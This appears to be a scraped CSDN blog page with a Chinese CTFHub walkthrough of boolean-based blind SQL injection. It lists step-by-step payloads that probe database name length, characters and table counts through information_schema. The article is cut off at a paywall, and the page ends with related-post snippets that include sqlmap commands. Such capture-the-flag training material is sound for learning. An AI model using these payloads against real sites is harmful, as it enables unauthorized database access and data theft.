布尔盲注(ctfhub)_ctf 布尔盲注脚本

最新推荐文章于 2024-11-22 10:20:00 发布
最新推荐文章于 2024-11-22 10:20:00 发布
阅读量997 收藏 12
点赞数 25
分类专栏: 程序员 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83704125/article/details/137608990
版权
本文详细介绍了布尔盲注的过程,包括手动注入的各个步骤,如爆数据库名长度、表数量、表名、列名及数据值。同时讨论了如何利用Python脚本进行自动化注入,特别针对'flag'表和列进行操作。此外,作者分享了个人的编程经历,并提供了一份全面的Python开发学习资源集合。
摘要由CSDN通过智能技术生成

布尔盲注的条件: ?id=1’ and 1=1–+ 真页面true

?id=1’ and 1=2–+ 假页面false

#  substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数

#  limit 0,1:表示从第0行开始,显示1行,从0开始计数

一、手动注入

一般顺序:

爆数据库名长度
        根据库名长度爆库名
        爆数据表数量
        爆数据表名长度
        根据表名长度爆表名
        根据flag表爆数据列数量
        爆数据列名长度
        根据列名长度爆列名
        根据列名爆数据值

1. 爆数据库名长度
?id=1 and length(database())>=5
#返回假值

?id=1 and length(database())>=4
#返回真值
#库名长度为4
2. 根据库名长度爆库名

使用substrate()函数逐个猜数据库名

?id=1 and substr(database(),1,1)=‘a’
#query_error
#库名第一个字符不是a
...
?id=1 and substr(database(),1,1)=‘s’
#query_success
#库名第一个字符是s
?id=1 and substr(database(),2,1)=‘q’
#query_success
#库名第一个字符是q
?id=1 and substr(database(),3,1)=‘l’
#query_success
#库名第一个字符是l
?id=1 and substr(database(),4,1)=‘i’
#query_success
#库名第四个字符是i

#库名是sqli
3. 爆数据表数量

使用mysql的查询语句select COUNT(*)。从1开始试错

?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())>=2
#query_success
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())>=3
#query_error
#当前库sqli有2张表
4.爆数据表名长度

使用 limit 0,1(第一张表),limi

最低0.47元/天 解锁文章
[PwnThyBytes 2019]Baby_SQL - 代码审计+布尔盲注+SESSION_UPLOAD_PROGRESS利用
oZuoShen123的博客
10-10 316
简单的分析一下: 1、index.php中,开启了session,我们通过任何方式的传参都会经过过滤函数   过滤函数:参数值必须是字符串,其次是通过addslashes函数过滤 2、login.php,存在sql语句,并写了数据库是ptbctf,密码通过MD5的形式校验 3、register.php,用户名不允许是admin,且长度要6
CTF从入门到提升(五) 部分截取函数及bool型盲注相关例题分析
anquanniu的博客
08-27 578
bool型盲注有区别与之前的基于时间的盲注,bool型盲注的页面输入会影响输出。 ​​我们来看操作理解一下: 语句结构id=1 ,我们去做判断的时候是id=1 and 1=1,and 1=1的本质是返回一个true,true可以用1来代替,正常回显。我们很多时候就会去接and=0,0类似于1=2返回是false, false类似于0的作用。 最后会影响到查询结果的是后面的0和1。 比如说触发查询...
布尔盲注ctfhub
2401_82985722的博客
03-27 1651
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
CTFHub技能树--sql注入布尔盲注步骤详解
最新发布
wqatss的博客
11-22 1813
解题步骤:库->表->列->数据
CTFhub布尔盲注
ndjnddjxn的博客
04-12 1276
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTFHUB-布尔盲注
Web学习之路
03-24 1354
true 与 false
ctfhub 布尔盲注
plant1234的博客
06-17 1692
布尔盲注: 布尔盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schem
CTFhub布尔盲注脚本
qq_41565526的博客
02-04 581
CTFhub布尔盲注脚本
sql盲注 解决_SQL注入之基于布尔盲注详解
weixin_39638086的博客
12-19 598
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
CTFHub | 布尔盲注
尼泊罗河伯的博客
10-29 1945
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。构造 payload 验证是否属于整数型注入,确定此题为整数型注入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写
热门推荐
Ho1aAs‘s Blog
11-19 1万+
文章目录前言盲注思路盲注原理盲注常用函数完 前言 布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注就是穷举试错,由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错 盲注思路 由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下: 爆数据库名长度 根据库名长度爆数据库名 对当前数据库爆数据表数量 根据表数量爆数据表名长度 根据表名长度爆数据表名 对所有数据表爆列数量 根据列数量爆列名长度 根据列
CTF技能树笔记之WEB-SQL注入布尔盲注
weixin_48799157的博客
04-02 2858
小白一个,如有错误请指正! 一、布尔注入 盲注有三种解法: 1.sqlmap 2.python脚本 3.手注 这里我就用sqlmap和脚本(手注真的会累死人的有木有?) 解法一:sqlmap 我们只需要按步骤来就可以了 sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs sqlmap -u http://challenge-00cfdd6ec4589579.sandbo
CTFHUB-SQL注入-布尔盲注
weixin_68416970的博客
06-12 971
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
ctf】sql注入——布尔型的盲注
wlllllianqing的博客
09-26 380
关于布尔型的盲注
CTFHub-web(sql布尔盲注)
分享与记录
07-22 4734
文章目录手工注入sqlmap注入总结 手工注入 1. 题目直接说明了是布尔盲注,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
CTFHub布尔盲注(新的payload)
weixin_44732566的博客
02-23 5545
CTFHub 布尔盲注 题目已经表明是布尔盲注,发现没有闭合,也木有过滤,本来也是道基础题,但是发现回显不对头: payload:?id=1 and 's'='p' 回显是query_success 这道题和普通的布尔盲注不一样,一般布尔盲注(我做的也不多)是数据库查询结果为空或者查询语句报错,回显error。这道题是数据库查询为空,返回还是success,只有当查询语句报错时才返回erroe。 ...
ctf布尔注入
chualam的博客
11-03 338
步骤:猜数据库名字长度--猜数据库名字 --猜表单数量--猜表单名字长度 --猜表单名字--猜字段数量--猜字段长度--猜字段 1 and length(database())>3 1 and mid(database(),1,1)='a' //用substr函数也行 1 and ascii(substr((select database()),1,1))='数字' 1 and left(database(),4)='sqli' //判断字符串 1 and 1=((select count.
CTFHUB(WEB) 布尔注入
qq_54929891的博客
09-21 1381
麻烦的来了诶,装作不知道是布尔注入,依然按照题目意思输入1看看 从这里可以知道我们不需要打引号 哦对了,我们先应该判断是否有注入点,利用真假语句来判断id的值是否可以改变sql语句的变化 通过恒真语句and 1=1和恒假语句and 1=2得知id的值可以改变sql语句的走向,说明这里存在注入点,然后便上网查询一下布尔注入应该要用到哪些函数语句 length()返回长度 这里弊端就是因为都是ctfhub上面的题,只是注入方式改变,数据库名啥的没变,所以只是为了让我们动手用这种方法..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值